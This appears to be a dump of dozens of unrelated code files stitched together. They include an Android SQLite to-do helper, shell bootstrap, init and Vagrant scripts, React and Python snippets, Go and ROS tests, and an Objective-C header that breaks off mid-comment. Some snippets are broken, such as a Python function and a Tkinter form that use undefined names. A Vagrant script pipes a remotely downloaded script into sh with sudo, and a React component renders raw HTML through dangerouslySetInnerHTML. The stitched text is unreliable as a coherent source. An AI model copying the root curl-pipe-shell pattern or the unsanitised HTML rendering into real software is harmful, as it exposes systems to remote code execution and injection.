package com.example.todolist.sqlitepackage; import android.content.ContentValues; import android.content.Context; import android.database.Cursor; import android.database.sqlite.SQLiteDatabase; import android.database.sqlite.SQLiteOpenHelper; import android.util.Log; import java.util.ArrayList; import java.util.List; public class MyDbHandler extends SQLiteOpenHelper { // constructor public MyDbHandler(Context context) { super(context, Params.DB_NAME, null, Params.DB_VERSION); } @Override public void onCreate(SQLiteDatabase sqLiteDatabase) { // SQL query to initialize databse String create = "CREATE TABLE " + Params.TABLE_NAME + "(" + Params.KEY_ID + " INTEGER PRIMARY KEY, " + Params.KEY_NAME + " TEXT, " + Params.KEY_DESCRIPTION + " TEXT" + ")"; Log.d("db", "Query: " + create); sqLiteDatabase.execSQL(create); } @Override public void onUpgrade(SQLiteDatabase sqLiteDatabase, int i, int i1) { } // function to add task public void addTask(Task task){ // Getting writable database as we want to add task SQLiteDatabase db = this.getWritableDatabase(); // Initializing values object of class ContentValues and storing values in it ContentValues values = new ContentValues(); values.put(Params.KEY_NAME, task.getName()); values.put(Params.KEY_DESCRIPTION, task.getDescription()); // Inserting inside database db.insert(Params.TABLE_NAME, null, values); Log.d("db", "Successfully inserted!!!"); db.close(); // closing databse } // function to retrieve all task public List<Task> getAllTasks() { // intializing arraylist of type Task List<Task> taskList = new ArrayList<>(); // Getting readable database as we only want to view it SQLiteDatabase db = this.getReadableDatabase(); //Generate the query to read from the database String select = "SELECT * FROM " + Params.TABLE_NAME; // Using a cursor object Cursor cursor = db.rawQuery(select, null); //Looping through it now using the cursor as the end conditon if (cursor.moveToFirst()){ do { Task task = new Task(); task.setId(Integer.parseInt(cursor.getString(0))); task.setName(cursor.getString(1)); task.setDescription(cursor.getString(2)); taskList.add(task); } while (cursor.moveToNext()); } return taskList; } // functioon to update any entry public int updateTask(Task task){ // Getting writable database as we want to update task SQLiteDatabase db = this.getWritableDatabase(); // Initializing values object of class ContentValues and storing values in it ContentValues values = new ContentValues(); values.put(Params.KEY_NAME, task.getName()); values.put(Params.KEY_DESCRIPTION, task.getDescription()); // Updating return db.update(Params.TABLE_NAME, values, Params.KEY_ID + "=?", new String[]{String.valueOf(task.getId())}); } // function to delete task by id public void deleteTaskById(int id){ // Getting writable database as we want to delete task SQLiteDatabase db = this.getWritableDatabase(); // deleting db.delete(Params.TABLE_NAME, Params.KEY_ID + "=?", new String[]{String.valueOf(id)}); // closing db.close(); } // function to delete task public void deleteTask(Task task){ // Getting writable database as we want to delete task SQLiteDatabase db = this.getWritableDatabase(); // deleting db.delete(Params.TABLE_NAME, Params.KEY_ID + "=?", new String[]{String.valueOf(task.getId())}); //closing db.close(); } // function to get number of entries in the database public int getCount(){ // SQL query String query = "SELECT * FROM " + Params.TABLE_NAME; // Getting readable database as we are not changing anything SQLiteDatabase db = this.getReadableDatabase(); // using cursor to iterate the query Cursor cursor = db.rawQuery(query, null); //return return cursor.getCount(); } }
wget http://mattmahoney.net/dc/enwik8.zip unzip enwik8.zip perl data/wikifil.pl enwik8 > text8 rm -f enwik8.zip rm -f enwik8
<filename>chapter06/Exercise_6_22.java package com.company; import java.util.Scanner; public class Exercise_6_22 { public static void main(String[] args) { Scanner input = new Scanner(System.in); System.out.print("Enter a positive number: "); double n = input.nextDouble(); System.out.printf("The square root of %f is %f", n, sqrt(n)); } public static double sqrt(double n) { double lastGuess = 1; double nextGuess = (lastGuess + n/ lastGuess)/2; while (Math.abs(lastGuess - nextGuess) >= 0.0001) { lastGuess = nextGuess; nextGuess = (lastGuess + n/ lastGuess)/2; } return nextGuess; } }
#!/usr/bin/env bash echo hello from $0
#! /bin/sh # Bootstrap Script # Copyright (C) 2019-2021 kaoru https://www.tetengo.org/ aclocal -I m4 && \ autoheader && \ libtoolize --copy && \ automake --add-missing --copy --gnu && \ autoconf
<gh_stars>0 import React, { FC, memo } from 'react'; import { MarkdownStyle } from './style'; export const Markdown: FC<{ html: string }> = memo(({ html }) => { return <MarkdownStyle dangerouslySetInnerHTML={{ __html: html }} />; });
#!/bin/sh # Add executable permission chmod +x bridgeconstructor.jar # Launch java -jar bridgeconstructor.jar
res1=$(date +%s.%N) ## VARIABLES ## folder="$1" tester="$2" ## Mocked functions #mock1="$3" #mock2="$4" ## Inlude ## #include="$5" if [ -d "$folder/output" ]; then echo "Diretorio output já existe" ; else `mkdir -p $folder/output`; echo "Diretorio output criado" fi cd "$folder" gcc $tester -I $include -Wl,--wrap=$mock1,--wrap=$mock2 -lcmocka 2> output/rtc_err.txt ./a.out 2> output/rtc.txt res2=$(date +%s.%N) dt=$(echo "$res2 - $res1" | bc) dd=$(echo "$dt/86400" | bc) dt2=$(echo "$dt-86400*$dd" | bc) dh=$(echo "$dt2/3600" | bc) dt3=$(echo "$dt2-3600*$dh" | bc) dm=$(echo "$dt3/60" | bc) ds=$(echo "$dt3-60*$dm" | bc) LC_NUMERIC=C printf "Runtime RTC: %d:%02d:%02d:%02.4f\n" $dd $dh $dm $ds >> "./time.txt"
def remove_duplicates(nums): res = [] for i in nums: if i not in res: res.append(i) return res result = remove_duplicates(nums) print(result)
<gh_stars>0 export interface Fault { }
<reponame>deepshig/leetcode-solutions<gh_stars>0 from typing import List class Solution: def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool: number_to_index = {} for i, n in enumerate(nums): if n in number_to_index and i-number_to_index[n] <= k: return True number_to_index[n] = i return False s = Solution() print("Solution 1 : ", s.containsNearbyDuplicate([1, 2, 3, 1], 3)) print("Solution 2 : ", s.containsNearbyDuplicate([1, 0, 1, 1], 1)) print("Solution 3 : ", s.containsNearbyDuplicate([1, 2, 3, 1, 2, 3], 2))
#!/bin/sh # # chkconfig: 345 80 20 # description: kestrel is a light-weight queue written in scala # # Source function library. if [ -f /etc/init.d/functions ] ; then . /etc/init.d/functions elif [ -f /etc/rc.d/init.d/functions ] ; then . /etc/rc.d/init.d/functions else exit 0 fi prog=kestrel USER=daemon KESTREL_HOME=/opt/kestrel VERSION=1.0 JAR=$KESTREL_HOME/kestrel-$VERSION.jar if [ ! -r $JAR ]; then echo "FAIL" echo "*** jar missing - not starting" exit 1 fi PIDFILE=/var/run/${prog}.pid LOCKFILE=/var/lock/subsys/$prog HEAP_OPTS="-Xmx2048m -Xms1024m -XX:NewSize=256m" JAVA_OPTS="-server -verbosegc -XX:+PrintGCDetails -XX:+UseConcMarkSweepGC -XX:+UseParNewGC $HEAP_OPTS" start() { echo -n $"Starting $prog: " java $JAVA_OPTS -jar $JAR > /var/log/$prog-startup.log 2>&1 & RETVAL=$? if [ $RETVAL -eq 0 ]; then echo $! > $PIDFILE success $"$prog startup" touch $LOCKFILE else failure $"$prog startup" fi echo return $RETVAL; } stop() { echo -n $"Stopping $prog: " if [ -f $PIDFILE ]; then killproc -p $PIDFILE $prog RETVAL=$? if [ $RETVAL -eq 0 ]; then rm -f $LOCKFILE rm -f $PIDFILE fi; else RETVAL=1 failure; fi echo return $RETVAL; } case "$1" in start) start ;; stop) stop ;; restart) stop start ;; condrestart) if [ -f $LOCKFILE ]; then stop start fi ;; *) echo $"Usage: $0 {start|stop|restart|condrestart}" exit 1 esac exit $RETVAL
#!/bin/bash script_location=$(dirname $0) echo $script_location cd $script_location pwd # browsrer url = 'http://127.0.0.1:8600/' npm run dev
"use strict"; var _react = _interopRequireDefault(require("react")); var _react2 = require("@storybook/react"); var _grommet = require("grommet"); var _themes = require("grommet/themes"); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; } var values = [20, 40, 60, 80, 100]; var MeterInTable = function MeterInTable() { return _react["default"].createElement(_grommet.Grommet, { theme: _themes.grommet }, _react["default"].createElement(_grommet.Box, { align: "center", pad: "large" }, _react["default"].createElement(_grommet.Box, { border: true }, _react["default"].createElement(_grommet.Table, { caption: "Meter Inside Table" }, _react["default"].createElement(_grommet.TableBody, null, values.map(function (val) { return _react["default"].createElement(_grommet.TableRow, null, _react["default"].createElement(_grommet.TableCell, null, _react["default"].createElement(_grommet.Meter, { type: "bar", values: [{ value: val }] })), _react["default"].createElement(_grommet.TableCell, null, _react["default"].createElement(_grommet.Text, null, val, "% complete"))); })))))); }; (0, _react2.storiesOf)('Table', module).add('Meter Inside Table', function () { return _react["default"].createElement(MeterInTable, null); });
#!/bin/bash sudo mkdir -p /vagrant/data # sudo ln -s /vagrant/data/docker /var/lib/docker # sudo cp /vagrant/apt.sources.list /etc/apt/sources.list echo Installing docker # curl -sSL http://acs-public-mirror.oss-cn-hangzhou.aliyuncs.com/docker-engine/internet | sed 's/apt-get install -y -q docker-engine/apt-get install -y -q docker-engine=1.12.6-0~ubuntu-xenial/g' | sh - sudo curl -sSL https://github.com/gitlawr/install-docker/blob/1.0/1.13.1.sh?raw=true | sh sudo usermod -aG docker ubuntu # sudo mkdir -p /etc/docker # sudo tee /etc/docker/daemon.json <<-'EOF' # { # "registry-mirrors": ["https://qtm2k3j2.mirror.aliyuncs.com"] # } # EOF # sudo mkdir -p /etc/systemd/system/docker.service.d # sudo tee /etc/systemd/system/docker.service.d/http-proxy.conf <<-'EOF' # [Service] # Environment="HTTP_PROXY=http://172.22.101.1:1087/" # EOF sudo systemctl daemon-reload sudo systemctl restart docker
import Tkinter as tk # Create a window window = tk.Tk() window.title("Ticket Booking System") # Create a frame frame = tk.Frame(window, bd = 5) # Create labels l_name = tk.Label(frame, text="Name") l_date = tk.Label(frame, text="Date") l_time = tk.Label(frame, text="Time") l_seats = tk.Label(frame, text="Number of Seats") # Create text boxes t_name = tk.Entry(frame) t_date = tk.Entry(frame) t_time = tk.Entry(frame) t_seats = tk.Entry(frame) # Create submit button submit_btn = tk.Button(frame, text="Submit", command= on_submit) # Add widgets to the frame l_name.grid(row=0, column=0) t_name.grid(row=0, column=1) l_date.grid(row=1, column=0) t_date.grid(row=1, column=1) l_time.grid(row=2, column=0) t_time.grid(row=2, column=1) l_seats.grid(row=3, column=0) t_seats.grid(row=3, column=1) submit_btn.grid(row=4, column=1) # Set size of the frame frame.grid(row=0, column=0) # Start the main loop window.mainloop()
#!/bin/sh ######################################################### # # # Name: Deploy Certificates # # Author: Diego Castagna (diegocastagna.com) # # Description: Deploy certificates using certbot # # License: diegocastagna.com/license # # # ######################################################### domains="" serverType="--nginx" # Checking if I'm root if [ $(id -u) -ne 0 ]; then printf "This script must be run as root\n" exit 1; fi read -p "Enter all the domains for the certificate separated by space ',' (leave blank to exit): " domains if [ -z "$domains" ]; then exit 0; fi if [ $(getent group www-data) ]; then serverType="--apache" fi certbot "$serverType" -n --agree-tos -d "$domains"
def delete(root, key): #base case if root is None: return None #searching for the node if root.data > key: root.left = delete(root.left, key) elif root.data < key: root.right = delete(root.right, key) else: # Node with only one child or no child if root.left is None: temp = root.right root = None return temp elif root.right is None: temp = root.left root = None return temp # Node with two children: Get the inorder succesor (smallest # in the right subtree) temp = minValueNode(root.right) # Copy the inorder succesor's content to this node root.data = temp.data # Delete the inorder succesor root.right = delete(root.right, temp) return root
<reponame>smagill/opensphere-desktop package io.opensphere.auxiliary.video; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import org.apache.log4j.Logger; import io.opensphere.core.util.io.StreamReader; /** * Utility class for extracting the Xuggler native libraries. */ public final class XugglerNativeUtilities { /** Logger reference. */ private static final Logger LOGGER = Logger.getLogger(XugglerNativeUtilities.class); /** True when extracting the native libraries has been attempted. */ private static boolean ourExplodeAttempted; /** * Extract the native libraries(s) from the jar and put them in a place * where Xuggler can use them. */ public static synchronized void explodeXugglerNatives() { if (!ourExplodeAttempted) { ourExplodeAttempted = true; // Create the directory to store the libs if necessary. String outPath = System.getProperty("java.io.tmpdir") + File.separator + "XugglerNative"; File outputDir = new File(outPath); if (!outputDir.exists() && !outputDir.mkdir()) { return; } // Add the location to the java.library.path so that Xuggler can // find the libs. String pathVar = System.getProperty("java.library.path", ""); StringBuilder pathBuilder = new StringBuilder(pathVar); if (!pathVar.isEmpty()) { pathBuilder.append(System.getProperty("path.separator")); } pathBuilder.append(outPath); System.setProperty("java.library.path", pathBuilder.toString()); // extract the libs for the correct OS String osName = System.getProperty("os.name"); if (osName.contains("Windows")) { boolean amd64 = "amd64".equals(System.getProperty("os.arch")); String prefix = amd64 ? "win32/x86_64/" : "win32/x86/"; String libgcc = amd64 ? "libgcc_s_seh-1.dll" : "libgcc_s_sjlj-1.dll"; explodeLib(prefix, outputDir, libgcc); System.load(outPath + File.separator + libgcc); explodeLib(prefix, outputDir, "libstdc++-6.dll"); System.load(outPath + File.separator + "libstdc++-6.dll"); // We do not need to load this, Xuggler will do it for us. explodeLib(prefix, outputDir, "libxuggle-5.dll"); } else { explodeLib("linux/x86_64/", outputDir, "libxuggle.so"); } } } /** * Extract the library from the path location and write it to a file in the * given location. * * @param libResourcePrefix The resource path where the library currently * resides. * @param outputDir The directory where the library should be written. * @param libName The name of the library in the output location. */ private static void explodeLib(String libResourcePrefix, File outputDir, String libName) { try (InputStream libStream = XugglerNativeUtilities.class.getClassLoader() .getResourceAsStream(libResourcePrefix + libName)) { // Always write the file in case a new version is deployed File libFile = new File(outputDir.getAbsolutePath() + File.separator + libName); try (FileOutputStream libOutput = new FileOutputStream(libFile)) { StreamReader reader = new StreamReader(libStream); reader.readStreamToOutputStream(libOutput); } } catch (IOException e) { LOGGER.error("Failed to extract xuggler native library." + e, e); } } /** Disallow instantiation. */ private XugglerNativeUtilities() { } }
# testDCOM usage="""\ testDCOM.py - Simple DCOM test Usage: testDCOM.py serverName Attempts to start the Python.Interpreter object on the named machine, and checks that the object is indeed running remotely. Requires the named server be configured to run DCOM (using dcomcnfg.exe), and the Python.Interpreter object installed and registered on that machine. The Python.Interpreter object must be installed on the local machine, but no special DCOM configuration should be necessary. """ # NOTE: If you configured the object locally using dcomcnfg, you could # simple use Dispatch rather than DispatchEx. import pythoncom, win32com.client, win32api, string, sys def test(serverName): if string.lower(serverName)==string.lower(win32api.GetComputerName()): print("You must specify a remote server name, not the local machine!") return # Hack to overcome a DCOM limitation. As the Python.Interpreter object # is probably installed locally as an InProc object, DCOM seems to ignore # all settings, and use the local object. clsctx = pythoncom.CLSCTX_SERVER & ~pythoncom.CLSCTX_INPROC_SERVER ob = win32com.client.DispatchEx("Python.Interpreter", serverName, clsctx=clsctx) ob.Exec("import win32api") actualName = ob.Eval("win32api.GetComputerName()") if string.lower(serverName) != string.lower(actualName): print("Error: The object created on server '%s' reported its name as '%s'" % (serverName, actualName)) else: print("Object created and tested OK on server '%s'" % serverName) if __name__=='__main__': if len(sys.argv) == 2: test(sys.argv[1]) else: print(usage)
def _backwardCompat(result_json): bc_json = dict() for k, v in result_json.items(): if isinstance(v, dict): bc_json[k[0].lower() + k[1:]] = _backwardCompat(v) elif k == 'Token': bc_json['sessionToken'] = v else: bc_json[k[0].lower() + k[1:]] = v return bc_json # Example usage input_json = { 'Name': 'John', 'Details': { 'Age': 30, 'Address': { 'City': 'New York', 'ZipCode': '10001' } }, 'Token': 'abc123' } backward_compatible_json = _backwardCompat(input_json) print(backward_compatible_json)
<reponame>lochbrunner/moveit2<filename>moveit_experimental/moveit_jog_arm/test/python_tests/halt_msg/test_jog_arm_halt_msg.py #!/usr/bin/env python import time import pytest import rospy from geometry_msgs.msg import TwistStamped from control_msgs.msg import JointJog from std_msgs.msg import Int8 # Import common Python test utilities from os import sys, path sys.path.append(path.dirname(path.dirname(path.abspath(__file__)))) import util # The robot starts at a singular position (see config file). # The jogger should halt and publish a warning. # Listen for a warning message from the jogger. # This can be run as part of a pytest, or like a normal ROS executable: # rosrun moveit_jog_arm test_jog_arm_halt_msg.py CARTESIAN_JOG_COMMAND_TOPIC = 'jog_server/delta_jog_cmds' # jog_arm should publish a nonzero warning code here STATUS_TOPIC = 'jog_server/status' @pytest.fixture def node(): return rospy.init_node('pytest', anonymous=True) class CartesianJogCmd(object): def __init__(self): self._pub = rospy.Publisher( CARTESIAN_JOG_COMMAND_TOPIC, TwistStamped, queue_size=10 ) def send_cmd(self, linear, angular): ts = TwistStamped() ts.header.stamp = rospy.Time.now() ts.twist.linear.x, ts.twist.linear.y, ts.twist.linear.z = linear ts.twist.angular.x, ts.twist.angular.y, ts.twist.angular.z = angular self._pub.publish(ts) def test_jog_arm_halt_msg(node): assert util.wait_for_jogger_initialization() received = [] sub = rospy.Subscriber( STATUS_TOPIC, Int8, lambda msg: received.append(msg) ) cartesian_cmd = CartesianJogCmd() # This nonzero command should produce jogging output # A subscriber in a different timer fills `received` TEST_DURATION = 1 start_time = rospy.get_rostime() received = [] while (rospy.get_rostime() - start_time).to_sec() < TEST_DURATION: cartesian_cmd.send_cmd([1, 1, 1], [0, 0, 1]) time.sleep(0.1) # Check the received messages # A non-zero value signifies a warning assert len(received) > 3 assert any(i != 0 for i in received[-3:]) if __name__ == '__main__': node = node() test_jog_arm_halt_msg(node)
#include "killcovidrun.h" #include <Utils/jsonio.h> /** * \file killcovidrun.cpp * \brief Implementation of the KillCovid-specific Game Run. * \author <NAME> */ KillCovidRun::KillCovidRun(){ } KillCovidRun::KillCovidRun(const QString& path):BaseRun(path){} KillCovidRun::KillCovidRun(int score) : score(score){} bool KillCovidRun::lessThan(const BaseRun *rhs){ KillCovidRun* other = (KillCovidRun *) rhs; if(this->score == other->score){ return this->datetime > other->datetime; }else{ return this->score < other->score; } } int KillCovidRun::toJson(){ QJsonObject killCovidRun; killCovidRun["datetime"] = QString::number(this->datetime); killCovidRun["player_name"] = this->playerName; killCovidRun["score"] = this->score; return JsonIO::writeObject(killCovidRun, path); } int KillCovidRun::fromJson(){ QJsonObject killCovidRun; int errorCode = JsonIO::readObject(killCovidRun, path); this->datetime = killCovidRun["datetime"].toString().toULongLong(); this->playerName = killCovidRun["player_name"].toString(); this->score = killCovidRun["score"].toInt(); return errorCode; } int KillCovidRun::getScore(){ return this->score; }
<reponame>NaKolenke/kolenka-backend import datetime import pytest from src.model.models import Tag, TagMark @pytest.fixture def tag(post): tag = Tag.create(created_date=datetime.datetime.now(), title=u"тэг",) TagMark.create(tag=tag, post=post) from src.model import db db.db_wrapper.database.close() return tag @pytest.fixture def tag_no_post(): tag = Tag.create(created_date=datetime.datetime.now(), title=u"тэг",) from src.model import db db.db_wrapper.database.close() return tag def test_tags(client, tag): rv = client.get("/tags/") assert rv.json["success"] == 1 assert len(rv.json["tags"]) == 1, "We should have only one tag" assert rv.json["tags"][0]["title"] == tag.title, "Wrong title" assert rv.json["meta"]["page_count"] == 1, "There should be one page" def test_tags_no_post(client, tag_no_post): rv = client.get("/tags/") assert rv.json["success"] == 1 assert len(rv.json["tags"]) == 1, "We should have only one tag" assert rv.json["tags"][0]["title"] == tag_no_post.title, "Wrong title" assert rv.json["meta"]["page_count"] == 1, "There should be one page" def test_no_tags(client): rv = client.get("/tags/") assert rv.json["success"] == 1 assert len(rv.json["tags"]) == 0, "We should have no tags" assert rv.json["meta"]["page_count"] == 0, "There should be no pages" def test_tag(client, tag, post): rv = client.get("/tags/" + tag.title + "/") assert rv.json["success"] == 1 assert len(rv.json["posts"]) == 1, "We should have only one post" assert rv.json["posts"][0]["title"] == post.title, "Wrong title" assert rv.json["meta"]["page_count"] == 1, "There should be one page" def test_suggestions(client, tag): rv = client.post("/tags/suggestion/", json={"title": u"тэ"}) assert rv.json["success"] == 1 assert len(rv.json["tags"]) == 1, "We should have only one tag" assert rv.json["tags"][0]["title"] == tag.title, "Wrong title" rv = client.post("/tags/suggestion/", json={"title": "ta"}) assert rv.json["success"] == 1 assert len(rv.json["tags"]) == 0, "We should have no tags"
import pandas as pd from sklearn.linear_model import LinearRegression from sklearn.model_selection import train_test_split # loading dataset and dividing into features and target data = pd.read_csv('dataset.csv') X = data.iloc[:, :-1] y = data.iloc[:, -1] # split dataset into train and test X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0) # create the model and fit it with the training data regressor = LinearRegression() regressor.fit(X_train, y_train) # evaluate the model with test data score = regressor.score(X_test, y_test) print('Accuracy of model:',score*100,'%')
export * from './buffer-geometry.directive';
# testing simple launch without autoscaling aws ec2 run-instances --image-id $1 --count $2 --instance-type $3 --security-group-ids $4 --subnet-id $5 --key-name $6 --associate-public-ip-address --iam-instance-profile Name=$7 --user-data file://install-webserver.sh --debug #testing database connection #aws rds create-db-instance --db-name simmoncatdb --db-instance-identifier simmon-the-cat-db --db-instance-class db.t1.micro --engine mysql --master-username LN1878 --master-user-password hesaysmeow --allocated-storage 5 #wait #echo -e "\nPlease wait for a few minute, creating database : simmoncatdb . . ." #aws rds wait db-instance-available --db-instance-identifier simmon-the-cat-db #echo -e "\n Finished creating the database."
<reponame>premss79/zignaly-webapp export { default } from "./ConfirmTwoFADisableForm";
<gh_stars>0 var _input_output_tensor_names_8cpp = [ [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#adbada061eaef5ccd88559389007bc45b", null ], [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#a141fb364180f4a3b7b31b1cd33d162ab", null ], [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#aa4e3edcaa4db14810764452fcc4d61b0", null ], [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#ac5dca292cc3d652bf21ea3acc6361e67", null ], [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#a694ee3f9f1226a0a9b65d223cdd89429", null ], [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#a0e8ed45dd35ce63037318f7a501e51bf", null ] ];
#!/bin/bash # Copyright © 2021 Pittsburgh Supercomputing Center. # All Rights Reserved. IMAGE=singularity-ncdu-1.13.sif DEFINITION=Singularity if [ -f $IMAGE ]; then rm -fv $IMAGE fi singularity build --remote $IMAGE $DEFINITION if [ -f $IMAGE ]; then exit 0 else exit 1 fi
#!/usr/bin/env sh # Based on code from https://github.com/TrueBitFoundation/wasm-ports/blob/master/openssl.sh OPENSSL_VERSION=1.1.1d PREFIX=`pwd` DIRECTORY="openssl-${OPENSSL_VERSION}" if [ ! -d "$DIRECTORY" ]; then echo "Download source code" curl https://www.openssl.org/source/openssl-${OPENSSL_VERSION}.tar.gz -o openssl-${OPENSSL_VERSION}.tar.gz tar xf openssl-${OPENSSL_VERSION}.tar.gz fi cd patch-${OPENSSL_VERSION} find . -type f | cpio -pvduml ../openssl-${OPENSSL_VERSION} cd ../openssl-${OPENSSL_VERSION} echo "Configure" make clean wasiconfigure ./Configure gcc -no-tests -no-asm -static -no-sock -no-afalgeng -DOPENSSL_SYS_NETWARE -DSIG_DFL=0 -DSIG_IGN=0 -DHAVE_FORK=0 -DOPENSSL_NO_AFALGENG=1 --with-rand-seed=getrandom || exit $? sed -i -e "s/CNF_EX_LIBS=/CNF_EX_LIBS=-lwasi-emulated-mman /g" Makefile make apps/progs.h sed -i 's|^CROSS_COMPILE.*$|CROSS_COMPILE=|g' Makefile echo "Build" wasimake make -j12 build_generated libssl.a libcrypto.a apps/openssl rm -rf ${PREFIX}/include mkdir -p ${PREFIX}/include cp -R include/openssl ${PREFIX}/include cp -R apps/openssl.wasm ../openssl.wasm # echo "Generate libraries .wasm files" # wasicc libcrypto.a -o ${PREFIX}/libcrypto.wasm # wasicc libssl.a -o ${PREFIX}/libssl.wasm # echo "Link" # wasicc apps/*.o libssl.a libcrypto.a \ # -o ${PREFIX}/openssl.wasm # chmod +x ${PREFIX}/openssl.wasm || exit $? echo "Done"
package iterator_test import ( "errors" "testing" . "github.com/rotationalio/honu/iterator" "github.com/rotationalio/honu/options" "github.com/stretchr/testify/require" ) func TestEmptyIterator(t *testing.T) { // Check that the empty iterator returns expected values iter := NewEmptyIterator(nil, "") require.False(t, iter.Next()) require.False(t, iter.Prev()) require.False(t, iter.Seek([]byte("foo"))) require.Nil(t, iter.Key()) require.Nil(t, iter.Value()) require.NoError(t, iter.Error()) require.Equal(t, options.NamespaceDefault, iter.Namespace()) obj, err := iter.Object() require.NoError(t, err) require.Nil(t, obj) // After calling release the empty iterator should still have no error iter.Release() require.NoError(t, iter.Error()) // However if next is called after release, then the iterator should error require.False(t, iter.Next()) require.EqualError(t, iter.Error(), ErrIterReleased.Error()) // Check that the empty iterator can be initialized with an error iter = NewEmptyIterator(errors.New("something bad happened"), "foo") require.EqualError(t, iter.Error(), "something bad happened") // Ensure that calling any of the iterator methods do not change the error require.False(t, iter.Next()) require.False(t, iter.Prev()) require.False(t, iter.Seek([]byte("foo"))) require.Nil(t, iter.Key()) require.Nil(t, iter.Value()) require.Equal(t, "foo", iter.Namespace()) obj, err = iter.Object() require.NoError(t, err) require.Nil(t, obj) require.EqualError(t, iter.Error(), "something bad happened") // Ensure calling Release doesn't change the error iter.Release() require.EqualError(t, iter.Error(), "something bad happened") // Ensure calling Next after Release doesn't change the error iter.Next() require.EqualError(t, iter.Error(), "something bad happened") }
<reponame>JakobLangenbahn/crosslingual-information-retrieval """ Functions to lod embeddings. """ import codecs import io import pickle import numpy as np def load_embedding(fname, number_tokens=5000): """ Load the Monolingual Word Embeddings. Args: fname: Path to Monolingual Embedding. number_tokens: Cut dictionary at number_tokens. Returns: list: list of all embed word as strings array: Word Embeddings """ fin = io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore') words = [] embedding = [] for index, line in enumerate(fin): if index == 0: continue tokens = line.rstrip().split(' ') words.append(tokens[0].lower()) embedding.append(tokens[1:]) if index == number_tokens: return words, np.array(embedding).astype("float32") return words, np.array(embedding) def load_translation_dict(dict_path): """ Load Translation Dictionary (txt or tsv file). Args: dict_path: Path to Translation Dictionary. Returns: list: List of source word as strings. list: List of target word as strings. """ translation_source = [] translation_target = [] file_type = dict_path.split(".")[-1] if file_type == "tsv": for line in list(codecs.open(dict_path, "r", encoding='utf8', errors='replace').readlines()): line = line.strip().split("\t") translation_source.append(line[0].lower()) translation_target.append(line[1].lower()) elif file_type == "txt": with open(dict_path) as file_in: for line in file_in: line = line.rstrip("\n") line = ' '.join(line.split()) [src, trg] = line.split(" ") translation_source.append(src.lower()) translation_target.append(trg.lower()) else: print("No supported dictionary file type") return translation_source, translation_target def save_clew(clew_method, name): """ Save Cross Lingual Word Embeddings. Args: clew_method: Cross Lingual Word Embedding Class. name: Name of Method for saving the file. Returns: """ with open(name + '_src_emb.pkl', 'wb') as f: pickle.dump(clew_method.proj_embedding_source_target, f) with open(name + '_trg_emb.pkl', 'wb') as f: pickle.dump(clew_method.target_embedding_matrix, f) with open(name + '_src_word.pkl', 'wb') as f: pickle.dump(clew_method.src_word2ind, f) with open(name + '_trg_word.pkl', 'wb') as f: pickle.dump(clew_method.trg_word2ind, f)
// // TTBaseRequest.h // TT // // Created by 张福润 on 2017/3/11. // Copyright © 2017年 张福润. All rights reserved. // #import <Foundation/Foundation.h> #import "TTBaseReqCommon.h" @class UIImage; @class TTBaseRequest; extern const NSInteger REQUEST_DEFAULT_ERROR_CODE; extern NSString * const Key_Model; @interface TTBaseRequest : NSObject @property (nonatomic, copy, readonly) NSString *requestUrl; @property (nonatomic, strong, readonly) NSDictionary *requestParameters; @property (nonatomic, strong, readonly) NSMutableArray *binaryParameterArray; @property (nonatomic, strong, readonly) NSMutableDictionary *resultDict; @property (nonatomic, strong, readonly) NSMutableArray *resultArray; @property (nonatomic, copy) NSString *resultString; @property (nonatomic, strong, readonly) UIImage *responseImage; @property (nonatomic, assign, readonly) BOOL isSuccess; #pragma mark - Class Methods /** 基本数据请求 @param parameters 请求参数,将需要的参数名称+参数实体(非二进制) @param successBlock 成功回调 @param cancelBlock 取消回调 @param failureBlock 失败回调 */ + (void)requestParameters:(NSDictionary *)parameters successBlock:(reqSuccessBlock)successBlock cancelBlock:(reqCancelBlock)cancelBlock failureBlock:(reqFailureBlock)failureBlock; /** 上传执行数据请求 @param parameters 请求参数,主要是对接服务器接口所需要的参数 @param binaryArray 二进制文件(这里采用封装的TTBinaryData对象) @param successBlock 成功回调 @param cancelBlock 失败回调 @param failureBlock 取消回调 @param uploadProcessBlock 上传进度回调 */ + (void)requestParameters:(NSDictionary *)parameters binaryArray:(NSMutableArray *)binaryArray successBlock:(reqSuccessBlock)successBlock cancelBlock:(reqCancelBlock)cancelBlock failureBlock:(reqFailureBlock)failureBlock uplodProcessBlock:(reqUploadBlock)uploadProcessBlock; /** 获取请求的URL地址(可以理解为请求地址) */ - (NSString *)getRequestUrl; /** 当前是不是正在请求数据的过成功 e.g.主要是解决数据重复请求的问题 */ + (BOOL)isRequesting; /** 启动网络监听 PS:这个要在系统启动的时候调用,进行网络数据监听 */ + (void)starNetWorkReachability; /** 当前网络状态 */ + (TTNetworkReachabilityStatus)fetchReachabilityStatus; #pragma mark - Children Class // 针对请求的链接,个人理解可以分为:根目录+分类文件地址+参数 /** 设置请求地址(开头根文件地址) 这里我们可以理解为,在整个项目的请求连接中,所有数据请求的根目录 e.g.http://IP地址:端口/根文件夹/ */ - (NSString *)getRequestHost; /** 设置请求地址(分类文件地址) 根据不同的功能,后台提供的接口会根据功能进行分类,这里主要是重写返回当前数据请求的分类地址 */ - (NSString *)getRequestQuery; /** 设置请求头中"User-Agent"参数 主要是针对当前系统 */ - (NSString *)getUserAgent; /** 自定义请求头 PS:一般会出现在,项目数据请求的加密,在某阶段临时添加的请求头,区别于公司定制的Base请求头数据 */ - (NSDictionary<NSString *, NSString *> *)getCustomHeaders; /** 获取请求超时时间 默认是60.0秒 @return 超时时间 */ - (NSTimeInterval)getTimeoutInterval; /** 设置当前的数据请求类型 PS:这个的主要是针对实际的单个数据请求,进行重写 针对四个主流的请求类型,默认为Get,在进行Get数据请求的时候,不需要进行重写 */ - (TTRequestMethod)getRequestMethod; /** 请求参数 